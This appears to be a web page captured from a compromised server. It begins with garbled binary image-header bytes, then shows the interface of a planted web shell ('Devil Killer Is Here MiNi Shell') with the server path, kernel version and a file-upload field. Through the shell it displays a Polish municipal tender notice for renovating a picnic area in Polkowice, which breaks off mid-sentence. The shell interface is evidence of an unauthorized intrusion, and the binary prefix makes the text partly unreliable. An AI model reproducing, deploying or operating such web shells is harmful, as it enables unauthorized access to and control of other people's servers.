JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210902/0016826501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Renowacja placu piknikowego „Ścieżka Zdrowia” przy ul. Spokojnej w Polkowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA POLKOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647618</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Polkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768474121</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.nowak@gmina.polkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.polkowice.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Renowacja placu piknikowego „Ścieżka Zdrowia” przy ul. Spokojnej w Polkowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1a96b252-0bc1-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00168265</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002233/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Renowacja placu piknikowego „Ścieżka zdrowia” przy ul. Spokojnej w Polkowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie Ofert, wymiana informacji oraz przekazywanie dokumentów<br/>lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji<br/>elektronicznej: a)miniPortalu https://miniportal.uzp.gov.pl/ - strona internetowa prowadzonego<br/>postępowania (Ogłoszenie o zamówieniu, dokumenty zamówienia, w tym SWZ i Informacje dla<br/>Wykonawców o postępowaniu, szyfrowanie oferty, formularze ePuap) b)ePUAPu<br/>https://moj.gov.pl/nforms/ezamowienia lub https://epuap.gov.pl/wps/portal (formularze do komunikacji,<br/>SKŁADANIE OFERT) c)poczty elektronicznej a.nowak@gmina.polkowice.pl (korespondencja oprócz<br/>Ofert). d)Platformy e-Zamówienia https://ezamowienia.gov.pl/pl/ (Ogłoszenie o<br/>zamówieniu, informacje o postępowaniu). W korespondencji związanej z niniejszym postępowaniem<br/>strony posługują się nr referencyjnym ZP.271.47.2021.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>„Złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. 3. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP). Regulaminy dostępne są odpowiednio na stronach miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal. Przed przystąpieniem do<br/>wysyłania i odbierania w/w dokumentów Wykonawca powinien zapoznać się z aktualnymi i bieżącymi<br/>regulaminami i instrukcjami korzystania z miniPortalu oraz ePUAP, oraz do postępowania zgodnie z<br/>nimi. Zamawiający informuje, że szczegółowe Informacje o sposobie porozumiewania się<br/>Zamawiającego z Wykonawcami oraz przekazywania oświadczeń lub dokumentów określone zostały w<br/>Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozp. Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w spr ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozpo o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym<br/>dalej „RODO”) informujemy, że: 1) administratorem Pani/Pana danych osobowych jest Burmistrz<br/>Polkowic, z siedzibą w Polkowicach, ul. Rynek 1, 59-100 P-ce. 2) administrator wyznaczył Inspektora<br/>Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@gmina.polkowice.pl, w<br/>siedzibie administratora lub korespondencyjnie na adres Urzędu Gminy Polkowice: ul. Rynek 1, 59-100<br/>P-ce. 3) Pani/Pana dane osobowe przetwarzane będą na podst art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, zgodnie z SWZ.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ust Pzp. 5) Pani/Pana dane osobowe przechowywane<br/>będą przez odpowiedni okres wynikający z przepisów prawa, dotyczący obowiązku archiwizacji<br/>dokumentów (art. 78 ust. 1 ustawy Pzp oraz Rozp Prezesa RM z dnia 18.01.2011 r. w spr instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w spr organizacji i zakresu działania<br/>archiwów zakładowych); zgodnie z art. 269 ust. 3 ust Pzp okres przechowywania danych osobowych<br/>zamieszczanych w BZP określa Prezes UZP; 6) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp. 7) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO. 8) posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie<br/>administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu albo precyzowanie nazwy lub<br/>daty zakończonego postępowania o udzielenie zamówienia); b) na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników); c) na podst art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego);<br/>ponadto, wystąpienie z żądaniem ograniczenia przetwarzania nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego; d) prawo do<br/>wniesienia skargi do Prezesa UODO, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO; 9)w przypadku danych osobowych zamieszczonych<br/>przez Zamawiającego w BZP, prawo dostępu i prawo do sprostowania danych są wykonywane w<br/>drodze żądania skierowanego do Zamawiającego. 10)przysługuje Pani/Panu prawo wniesienia skargi<br/>do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez<br/>administratora. Organem właściwym dla przedmiotowej skargi jest UODO, ul. Stawki 2, 00-193<br/>Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">11) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3<br/>lit. b, d lub e RODO prawo do usunięcia danych osobowych;b) prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.47.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Głównym przedmiotem zamówienia jest dostawa i montaż elementów małej architektury oraz<br/>urządzeń komunalnych stanowiących wyposażenie placu piknikowego, dodatkowym –<br/>utwardzenie nawierzchni i renowacja istniejącego wyposażenia.<br/>2) Miejscem montażu jest plac zlokalizowany na dz. o nr ewidencyjnym 517/1 obręb 3 miasta<br/>Polkowice.<br/>3) Zakres zadania obejmuje:<br/>a) renowacje istniejącego wyposażenia terenu: wiaty metalowe, ławki, stoły, ławy,<br/>b) wykonanie utwardzenia pod wiatami kostką betonową,<br/>c) dostawę i montaż wyposażenia placu piknikowego.<br/>4) Szczegółowy opis przedmiotu zamówienia został określony w dokumentach zadania, które<br/>składają się z:<br/>a) SWZ,<br/>b) projektu zagospodarowania terenu,<br/>c) specyfikacji technicznej wykonania i odbioru robót budowlanych (ST),<br/>d) opisów pozycji przedmiaru robót.<br/>5) Dokumenty wymienione w pkt. 4) stanowią podstawę realizacji prac i wymagania określone w<br/>nich są obowiązujące dla Wykonawcy.<br/>6) Wykonawca zobowiązuje się wykonać przedmiot umowy z materiałów własnych, nowych i w<br/>pierwszym gatunku jakościowym.<br/>7) Materiały podlegające wbudowaniu muszą odpowiadać, co do jakości, wymogom wyrobów<br/>dopuszczonych do obrotu i stosowania w budownictwie.<br/>8) Za dopuszczone do stosowania w realizacji przedmiotu umowy przyjmuje się wyroby<br/>(materiały urządzenia), które zgodnie z odrębnymi przepisami oznakowano znakiem CE. W<br/>przypadku wyrobu nie posiadającego oznakowania CE dopuszczony do realizacji zamówienia<br/>będzie:<br/>a) wyrób wyprodukowany na terytorium Polski w zgodzie z istniejącą Polską Normą, dla którego<br/>wyrobu osobno Wykonawca/ producent załączył deklarację właściwości użytkowych lub:<br/>- w przypadku braku Polskiej Normy to wyprodukowany w zgodzie z uzyskaną aprobatą<br/>techniczną, a Wykonawca/ producent załączył deklarację zgodności z tą aprobatą,<br/>- posiada znak budowlany świadczący o zgodności z Polską Normą wyrobu albo aprobatą<br/>techniczną, a Wykonawca/ producent załączył odpowiednią informację o wyrobie,<br/>b) wyrób wyprodukowany poza terytorium Polski, na który udzielono mu aprobaty technicznej, a<br/>Wykonawca/producent załączył do wyrobu deklarację właściwości użytkowych,<br/>9) Kryteria oceny równoważności:<br/>Zamawiający uzna, że urządzenia/wyroby/materiały są równoważne do tych wskazanych w<br/>dokumentacji zamówienia pod warunkiem, że:<br/>a) spełniają one wymagania określone w pkt 6) - 8) oraz<br/>b) zapewniają taką samą przydatność eksploatacyjną polegającą na zapewnieniu tych samych<br/>funkcji użytkowych oraz<br/>c) ich wymiary nie będą mniejsze lub większe niż 5 % od tych wartości określonych w<br/>dokumentacji zamówienia.<br/>Wykonawcy udzielą gwarancji na wykonany przedmiot umowy. Okres udzielonej gwarancji<br/>będzie wynosił od 1 do 3 lat – zgodnie z kryterium oceny ofert określonym przez wykonawcę w<br/>ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34928210-3 - Wiaty drewniane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39113300-0 - Ławy</p> <p class="mb-0">39113600-3 - Ławki</p> <p class="mb-0">39121200-8 - Stoły</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45442121-1 - Malowanie budowli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według kryterium oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące<br/>zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat licząc wstecz od<br/>dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>- w tym okresie, wykonał należycie co najmniej dwa różne zamówienia o charakterze i złożoności<br/>porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie dostawy i<br/>montażu urządzeń komunalnych oraz elementów małej architektury, w których dostarczono i<br/>zamontowano łącznie min. 1 szt. altany o wym. min. 4x4 m, min. 5 szt. ławo-stołów i min. 10 szt.<br/>ławek parkowych, o wartości min. 50.000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w art. 108 ust. 1 ustawy Pzp, w tym również oświadczenie<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z<br/>innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie<br/>od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów<br/>określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane,<br/>a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy - załącznik nr 9 do SWZ;<br/>UWAGA: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonywanych<br/>wspólnie z innymi Wykonawcami, wykaz o którym mowa powyżej dotyczy dostaw, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych,<br/>w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający w celu potwierdzenia, że oferowane dostawy spełniają określone przez<br/>zamawiającego wymagania, wymaga złożenia przedmiotowych środków dowodowych w postaci<br/>kart technicznych/szczegółowych specyfikacji technicznych oferowanych urządzeń komunalnych<br/>oraz elementów małej architektury zawierających m.in.:<br/>- rysunki techniczne, wizualizację kolorystyczną urządzeń,<br/>- wymiary urządzeń, średnice rur, grubości desek, itp.,<br/>- opis użytych materiałów,<br/>- sposób zabezpieczenia elementów metalowych przed korozją,<br/>- rodzaj i sposób malowania poszczególnych elementów urządzeń,<br/>- sposób posadowienia w gruncie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Karty techniczne/szczegółowe specyfikacje techniczne oferowanych urządzeń komunalnych<br/>oraz elementów małej architektury zawierające m.in.:<br/>- rysunki techniczne, wizualizację kolorystyczną urządzeń,<br/>- wymiary urządzeń, średnice rur, grubości desek, itp.,<br/>- opis użytych materiałów,<br/>- sposób zabezpieczenia elementów metalowych przed korozją,<br/>- rodzaj i sposób malowania poszczególnych elementów urządzeń,<br/>- sposób posadowienia w gruncie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.	Do oferty Wykonawca zobowiązany jest dołączyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. W przypadku składania oferty przez podmioty występujące wspólnie wymóg dotyczy każdego z Wykonawców. Powyższy wymóg dotyczy także podmiotów 